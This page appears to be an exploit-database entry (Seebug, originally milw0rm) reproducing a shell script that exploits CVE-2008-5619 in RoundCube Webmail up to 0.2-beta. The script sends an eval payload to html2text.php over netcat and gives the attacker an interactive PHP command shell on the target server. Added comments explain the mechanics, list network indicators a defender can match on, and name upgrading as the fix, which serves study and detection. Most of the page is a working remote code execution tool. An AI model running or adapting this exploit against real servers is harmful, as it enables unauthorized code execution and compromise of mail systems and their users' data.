seebugRootSSV:66092
History: Jul 01, 2014 - 12:00 a.m.

RoundCube Webmail <= 0.2b Remote Code Execution Exploit

2014-07-01 00:00:00
Root
www.seebug.org

EPSS: 0.886 (High); Percentile: 98.4%

No description provided by source.


                                                #!/bin/sh
#
# I was hoping the PoC would not appear so soon,
# but now that it is out,
# i thought i might as well publish my real exploit.
#
# Hunger
#
#
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5619
#
# FOR LEARNING PURPOSES ONLY!
#
# PHP> echo(ini_get('disable_functions'));
#
# exec, system
#
# PHP> passthru("id; uname -a");
#
# uid=666(www-data) gid=666(www-data) groups=666(www-data)
# Linux mail 2.6.28 #0 Sun Jan 01 10:05:33 CET 2009 i686 GNU/Linux
#

# Interactive driver for the Roundcube html2text.php preg_replace()/eval bug
# (CVE-2008-5619, Roundcube Webmail <= 0.2-beta per the header above).
# Each typed command becomes one plain-text HTTP POST on port 80 (HTTP_PORT
# below): the PHP to run travels base64-encoded in the Accept: header and the
# fixed POST body makes the vulnerable template code decode and eval it.
#
# Everything a defender can match on is hard-coded here:
#   - POST to the html2text.php deep link with a 54-byte body
#     "<b>{${EVAL(BASE64_DECODE($_SERVER[HTTP_ACCEPT]))}}</b>"
#   - an Accept: header whose value is a base64 blob (decoded PHP ending in ';')
#   - User-Agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
# Mitigation: upgrade Roundcube beyond the affected releases.
#
# NOTE(review): the shebang is /bin/sh but the script uses `let`, `echo -e`
# and `echo -n`, so it only runs where /bin/sh is bash-compatible.

echo  &#39;Exploit for Roundcube Webmail =&#60; 0.2-beta&#39;
echo  &#39;html2text.php / preg_replace() / eval bug&#39;
echo -e &#39;\r\nby Hunger &#60;[email protected]&#62;\r\n\n&#39;

# Usage check: both the hostname ($1) and the deep link ($2) are required;
# only the second is tested because an empty $2 implies a missing argument.
if [ &#34;$2&#34; = &#34;&#34; ]; then echo &#34;
Usage:
$0 &#60;hostname&#62; &#60;deeplink&#62;

Example:
\$ $0 localhost /roundcube/bin/html2text.php


For https sites use stunnel or socat!
&#34;; exit 1; fi

# Locate the two external tools the script depends on. `which` output is
# empty when the tool is absent; `command -v` would be the portable form.
NETCATEXE=`which nc`
BASE64ENC=`which base64`

if [ &#34;$NETCATEXE&#34; = &#34;&#34; ] || [ &#34;$BASE64ENC&#34; = &#34;&#34; ]; 
then
   echo &#34;Required tool(s) missing... (netcat, base64)&#34;
   exit 2
fi

# Fixed User-Agent string sent with every request.
USERAGENT=&#34;Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)&#34;

# POST body: the `\$` escapes keep `${` and `$_SERVER` literal so the server
# side, not this shell, expands them. The payload is wrapped in <b>...</b>
# because html2text.php rewrites that tag (see the bug name in the banner).
MYPAYLOAD=&#34;{\${EVAL(BASE64_DECODE(\$_SERVER[HTTP_ACCEPT]))}}&#34;
EVALEDTAG=&#34;&#60;b&#62;&#34;
EVALEDTAG=$EVALEDTAG$MYPAYLOAD
EVALEDTAG=$EVALEDTAG&#34;&#60;/b&#62;&#34;

# Byte length of EVALEDTAG as built above (3 + 47 + 4 = 54); it is sent as
# Content-length and must be kept in sync if that body ever changes.
PARAMSIZE=54

HOST_NAME=$1
DEEP_LINK=$2
# Plain HTTP only; the usage text points at stunnel/socat for https.
HTTP_PORT=80

# Request header template. The `\r\n` here are literal backslash sequences;
# they are turned into CR LF by `echo -ne` at send time. The template ends
# with a bare "Accept:" so the base64 command can be appended as its value.
HTTPHEADR=&#34;&#34;
HTTPHEADR=$HTTPHEADR&#34;POST $DEEP_LINK HTTP/1.0\r\n&#34;
HTTPHEADR=$HTTPHEADR&#34;Host: $HOST_NAME\r\n&#34;
HTTPHEADR=$HTTPHEADR&#34;User-Agent: $USERAGENT\r\n&#34;
HTTPHEADR=$HTTPHEADR&#34;Content-length: $PARAMSIZE\r\n&#34;
HTTPHEADR=$HTTPHEADR&#34;Accept:&#34;

# First command sent: a PHP echo() of the SPLOITCHK marker plus a short
# greeting. The marker on the first body line is how success is detected.
SPLOITCHK=&#39;Succeeded! :))&#39;
PHPAYLOAD=&#39;echo(&#34;&#39;
PHPAYLOAD=$PHPAYLOAD$SPLOITCHK&#39;\r\n\r\n&#39;
PHPAYLOAD=$PHPAYLOAD&#39;Type PHP functions as shell commands. ;)\r\n&#39;
PHPAYLOAD=$PHPAYLOAD&#39;Use \&#34;exit\&#34; to close session.\r\n\r\n&#39;
PHPAYLOAD=$PHPAYLOAD&#39;Good luck and have phun! ;D\r\n\r\n&#39;
PHPAYLOAD=$PHPAYLOAD&#39;&#34;)&#39;

# Accepted status lines (either HTTP version).
HTTPOKMSG=&#34;HTTP/1.0 200 OK&#34;
HTTP1KMSG=&#34;HTTP/1.1 200 OK&#34;
# RETURNCHR ends up as a lone CR: `echo -e` emits CR LF and the command
# substitution strips the trailing LF. `read` below strips the LF of each
# CRLF response line but keeps the CR, hence every comparison appends it.
RETURNCHR=`echo -e &#34;\r\n&#34;`

echo -n &#34;Trying to exploit... &#34;

# Main loop: send the current command, parse the reply, prompt for the next
# one. Typing "exit" ends the session. f=0 means "no successful reply yet".
f=0; until [ &#34;$PHPAYLOAD&#34; = &#34;exit&#34; ]; do
 # base64 of the command plus a trailing ';', unwrapped so it fits one header.
 PHPAYLOAD=`echo &#34;$PHPAYLOAD;&#34; |$BASE64ENC --wrap=0`
 # headers + " " + base64 (the Accept: value) + blank line + fixed body
 HTTP_SEND=&#34;$HTTPHEADR $PHPAYLOAD\r\n\r\n$EVALEDTAG&#34;
 HTTP_BACK=`echo -ne &#34;$HTTP_SEND&#34;|$NETCATEXE $HOST_NAME $HTTP_PORT`
 # $? is the exit status of nc (last command in the substituted pipeline).
 if [ $? != 0 ]; then echo &#34;Connection failed.&#34;; exit 3; fi
 # Reply parser. It runs in a pipeline subshell, so l, e and f changed in
 # here do not survive past `done`; only the subshell's exit status does.
 #   l - line counter (line 1 must be a 200 status line)
 #   e - number of CR-only lines seen; >0 once the header/body separator passed
 #   f - success marker seen (subshell copy only)
 e=0; l=0; echo &#34;$HTTP_BACK&#34; | while read i; do let l++;
   if [ $l = 1 ] && [ &#34;$i&#34; != &#34;$HTTPOKMSG$RETURNCHR&#34; ] \
                 && [ &#34;$i&#34; != &#34;$HTTP1KMSG$RETURNCHR&#34; ]; then
      echo &#34;Bad Server Response :\\&#34;; exit 4; fi;
   # First body line echoed back literally means the template was not
   # evaluated, i.e. the target does not have the bug.
   if [ $e = 1 ] && [ $f = 0 ] && [ &#34;$i&#34; = &#34;$MYPAYLOAD&#34; ]; then
      echo &#34;Target has been patched /o\\&#34;; exit 4; fi
   # On the first request the first body line must be the SPLOITCHK marker.
   if [ $e = 1 ] && [ $f = 0 ] && [ &#34;$i&#34; != &#34;$SPLOITCHK$RETURNCHR&#34; ]; then
      echo -e &#34;Exploitation failed :((&#34;; exit 4; elif
         [ &#34;$i&#34; = &#34;$SPLOITCHK$RETURNCHR&#34; ]; then let f++; fi
   # Print body lines only (headers are skipped while e is still 0).
   if [ $e -gt 0 ]; then echo &#34;$i&#34;; fi
   if [ &#34;$i&#34; = &#34;$RETURNCHR&#34; ]; then let e++; fi
 done
 # $? here is the parser subshell's status: 4 means one of the exits above
 # fired. This `let f++` is the one that persists, so from the second request
 # on the f=0 checks in the parser are skipped.
 if [ $? != 4 ]; then let f++; echo -ne &#34;PHP&#62; &#34;; else
  echo -e &#34;\n\nDump:\n\n$HTTP_BACK&#34;; exit 4; fi;
 # Next command from stdin (no -r: backslashes in the input are interpreted).
 read PHPAYLOAD
done

# milw0rm.com [2008-12-22]